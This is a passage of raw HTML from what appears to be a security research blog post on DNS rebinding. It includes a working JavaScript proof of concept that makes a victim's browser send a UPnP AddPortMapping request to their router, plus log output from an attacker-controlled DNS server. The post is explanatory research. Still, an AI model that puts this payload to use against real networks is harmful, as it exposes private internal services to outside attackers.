z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">URL</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'http://127-0-0-1.192-168-1-1.attacker.mindedsecurity:5431/control/WANIPConnection'</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: 
border-box;"></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">soapBody</span> <span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'<?xml version="1.0"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>8989</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>80</NewInternalPort><NewInternalClient>192.168.1.1</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>UPnP port mapping PoC</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>'</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: 
inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">AddPortMapping</span>() {</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">jQuery</span>.<span class="cm-property" style="box-sizing: border-box;">ajax</span> ({</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; 
font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">url</span>: <span class="cm-variable" style="box-sizing: border-box;">URL</span>,</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">type</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"POST"</span>,</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">data</span>: <span class="cm-variable" style="box-sizing: border-box;">soapBody</span>,</span></pre><pre class="CodeMirror-line" role="presentation" 
style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">dataType</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"xml"</span>,</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">contentType</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"text/xml; charset=utf-8"</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span 
role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> });</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">poll</span>() {</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" 
style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">setTimeout</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> () {</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">AddPortMapping</span>();</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">poll</span>();</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: 
relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }, <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">180000</span>);</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">$</span>(<span class="cm-variable" style="box-sizing: border-box;">document</span>).<span class="cm-property" style="box-sizing: border-box;">ready</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> () {</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; 
break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">poll</span>();</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> });</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); 
border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; 
padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">h1</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span>DNS Rebinding attack against vulnerable router - AddPortMapping<span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">h1</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; 
overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre></div><div><br /></div><p style="text-align: justify;">The JavaScript embedded in the HTML phishing page repeatedly sends the <b>NAT Injection</b> SOAP request via XHR (every 180 seconds in the PoC above, so that the browser's cached DNS resolution has time to expire). The attacker-controlled DNS server is therefore queried several times and first answers with the real IP address of the <i><b>127-0-0-1.192-168-1-1.attacker.mindedsecurity.com</b></i> domain, in this case <b>127.0.0.1</b> because the web server was running locally. </p><p style="text-align: justify;">After a number of queries, the DNS server starts returning <b>192.168.1.1</b>, the router's address, so the browser's later requests to the same origin reach the router instead:</p><div style="text-align: justify;"><br /></div><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">$ sudo python dns_server.py</span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 
51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">0 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">1 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">2 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); 
border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">3 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">4 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">5 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; 
border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">6 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">7 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">8 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 192.168.1.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; 
border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">. . .</span></pre></div><p style="text-align: left;">This way, the request was successfully sent to the router adding the new port mapping rule:</p><div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwBTnTA04pWv2on1dFJLlCodvAHa1DjMzTaZQVYxoCPjiJGdcr8flX2vZlndRBcL4L66xEqRJBSnEkYU8Mu1zbNTdquupt58wxAgnlAQPNdlxnU-WCW7mIAwP4HrvWW1xofrQIgdc600jU/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="127" data-original-width="1351" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwBTnTA04pWv2on1dFJLlCodvAHa1DjMzTaZQVYxoCPjiJGdcr8flX2vZlndRBcL4L66xEqRJBSnEkYU8Mu1zbNTdquupt58wxAgnlAQPNdlxnU-WCW7mIAwP4HrvWW1xofrQIgdc600jU/w640-h60/nat.png" width="640" /></a></div><p style="text-align: left;"><span style="font-family: inherit;">The following diagram shows the complete attack flow.</span></p></div></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhORfqr28X7Q_nvK829h-aCfhcKn84I16OkBQc4wVAd2VLH_rRyN5pPZc6qxDv1_97BYSH1leTL3YRYgzJTlClCB7R-eMczYPmNkxMbgZNfXg0ChdjShO9rM-dgly_K43Dlb402D2bMwId3/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="662" data-original-width="1031" height="410" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhORfqr28X7Q_nvK829h-aCfhcKn84I16OkBQc4wVAd2VLH_rRyN5pPZc6qxDv1_97BYSH1leTL3YRYgzJTlClCB7R-eMczYPmNkxMbgZNfXg0ChdjShO9rM-dgly_K43Dlb402D2bMwId3/w640-h410/upnp_diagram.png" width="640" /></a></div></div><div><h3 style="text-align: left;">Conclusion</h3><div style="text-align: justify;"><p>The NAT Injection attack described here is just one example of how <b>DNS Rebinding</b> can be used to reach services running on a local network. It is possible to go further and use <b>DNS Rebinding</b> techniques to achieve <b>Remote Code Execution</b>.</p><div>The next part will therefore walk through another practical example, showing how to achieve RCE starting from a vulnerable service running on a local network.</div><div><br /></div></div><h3 style="text-align: left;">References:</h3><div><span id="docs-internal-guid-e813ec57-7fff-f1c4-8f17-6ff632552879"><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://crypto.stanford.edu/dns/">https://crypto.stanford.edu/dns/</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 